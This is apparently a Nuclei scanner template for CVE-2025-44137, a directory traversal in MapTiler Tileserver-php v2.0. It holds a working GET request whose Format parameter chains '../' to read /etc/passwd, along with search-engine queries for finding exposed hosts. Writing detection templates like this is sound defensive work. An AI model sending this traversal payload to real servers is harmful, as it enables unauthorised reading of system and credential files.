id: CVE-2025-44137 info: name: MapTiler Tileserver-php v2.0 - Unauthenticated File Read author: 0x_Akoko severity: high description: | MapTiler Tileserver-php v2.0 contains a directory traversal caused by improper sanitization of GET parameters in renderTile function, letting attackers read arbitrary files on the server, exploit requires crafted web requests impact: | Attackers can read arbitrary files on the server, potentially exposing sensitive information. remediation: | Update to the latest version of MapTiler Tileserver-php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-44137 - https://github.com/mheranco/CVE-2025-44137 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-44137 epss-score: 0.0136 epss-percentile: 0.68896 cwe-id: CWE-22 metadata: verified: true max-request: 1 shodan-query: title:"TileServer-php" fofa-query: title="TileServer-php" tags: cve,cve2025,lfi,maptiler,tileserver,traversal,vkev http: - method: GET path: - "{{BaseURL}}/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=." matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: content_type words: - "image/" - type: status status: - 200 # digest: 4b0a00483046022100fa4c07cd9847c93603915fbaa8e991c7707b09f905bfb59b99b5c77a14a7698b022100cc439c162e3f7e4b4a39157836768ad98c7a4e142171ebae5d826df51fbe165f:922c64590222798bb761d5b6d8e72950